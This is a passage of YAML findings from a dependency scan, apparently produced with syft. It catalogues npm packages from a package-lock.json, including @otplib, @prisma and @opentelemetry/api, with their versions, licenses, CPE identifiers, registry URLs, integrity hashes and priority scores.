- cpe: cpe:2.3:a:\@one_ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@one:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@one:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40one-ini/wasm@0.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz
integrity: sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3c1ae518b93a9e69
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @opentelemetry/api 1.9.1'
title: '@opentelemetry/api 1.9.1'
description: 'Package discovered: @opentelemetry/api 1.9.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 83e28d5e9e201d09
name: '@opentelemetry/api'
version: 1.9.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@opentelemetry\/api:\@opentelemetry\/api:1.9.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40opentelemetry/api@1.9.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz
integrity: sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f729f38c8f735bd2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @otplib/core 12.0.1'
title: '@otplib/core 12.0.1'
description: 'Package discovered: @otplib/core 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4401cb5cafc706d8
name: '@otplib/core'
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@otplib\/core:\@otplib\/core:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40otplib/core@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz
integrity: sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aa5d016d75962c38
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @otplib/plugin-crypto 12.0.1'
title: '@otplib/plugin-crypto 12.0.1'
description: 'Package discovered: @otplib/plugin-crypto 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f17e31d5db2de66e
name: '@otplib/plugin-crypto'
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40otplib/plugin-crypto@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz
integrity: sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==
dependencies:
'@otplib/core': ^12.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 58e5f41c022201bb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @otplib/plugin-thirty-two 12.0.1'
title: '@otplib/plugin-thirty-two 12.0.1'
description: 'Package discovered: @otplib/plugin-thirty-two 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 104b985242c58dc2
name: '@otplib/plugin-thirty-two'
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40otplib/plugin-thirty-two@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz
integrity: sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==
dependencies:
'@otplib/core': ^12.0.1
thirty-two: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: de3f341e44725439
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @otplib/preset-default 12.0.1'
title: '@otplib/preset-default 12.0.1'
description: 'Package discovered: @otplib/preset-default 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 05997a7e636d9fd8
name: '@otplib/preset-default'
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40otplib/preset-default@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz
integrity: sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==
dependencies:
'@otplib/core': ^12.0.1
'@otplib/plugin-crypto': ^12.0.1
'@otplib/plugin-thirty-two': ^12.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 61834b2dc1830a08
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @otplib/preset-v11 12.0.1'
title: '@otplib/preset-v11 12.0.1'
description: 'Package discovered: @otplib/preset-v11 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 59bf565b491e939f
name: '@otplib/preset-v11'
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40otplib/preset-v11@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz
integrity: sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==
dependencies:
'@otplib/core': ^12.0.1
'@otplib/plugin-crypto': ^12.0.1
'@otplib/plugin-thirty-two': ^12.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 242a3037b85d7c4e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @pkgjs/parseargs 0.11.0'
title: '@pkgjs/parseargs 0.11.0'
description: 'Package discovered: @pkgjs/parseargs 0.11.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 060c7b7a8f614664
name: '@pkgjs/parseargs'
version: 0.11.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@pkgjs\/parseargs:\@pkgjs\/parseargs:0.11.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40pkgjs/parseargs@0.11.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz
integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 83a6bc7b54c525e8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/client 5.22.0'
title: '@prisma/client 5.22.0'
description: 'Package discovered: @prisma/client 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c440900ad881e975
name: '@prisma/client'
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/client:\@prisma\/client:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/client@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz
integrity: sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 888b8378fb32621d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/debug 5.22.0'
title: '@prisma/debug 5.22.0'
description: 'Package discovered: @prisma/debug 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9f4e1fa5bdb80e5a
name: '@prisma/debug'
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/debug:\@prisma\/debug:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/debug@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz
integrity: sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1e736006ff85bb23
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/engines 5.22.0'
title: '@prisma/engines 5.22.0'
description: 'Package discovered: @prisma/engines 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0f98eed7c2a9484e
name: '@prisma/engines'
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/engines@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz
integrity: sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA==
dependencies:
'@prisma/debug': 5.22.0
'@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
'@prisma/fetch-engine': 5.22.0
'@prisma/get-platform': 5.22.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c3ee871894c65f6a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
title: '@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
description: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3a15a4d5b57a6a32
name: '@prisma/engines-version'
version: 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz
integrity: sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 17f0b8bb58a0d4a7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/fetch-engine 5.22.0'
title: '@prisma/fetch-engine 5.22.0'
description: 'Package discovered: @prisma/fetch-engine 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 373747b9463a5333
name: '@prisma/fetch-engine'
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/fetch-engine@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz
integrity: sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA==
dependencies:
'@prisma/debug': 5.22.0
'@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
'@prisma/get-platform': 5.22.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d7f7c5d00389674a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @prisma/get-platform 5.22.0'
title: '@prisma/get-platform 5.22.0'
description: 'Package discovered: @prisma/get-platform 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 35191eb100a1fadc
name: '@prisma/get-platform'
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40prisma/get-platform@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz
integrity: sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q==
dependencies:
'@prisma/debug': 5.22.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e931437e79a085b9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/aspromise 1.1.2'
title: '@protobufjs/aspromise 1.1.2'
description: 'Package discovered: @protobufjs/aspromise 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 503ecf3ae2d5a446
name: '@protobufjs/aspromise'
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
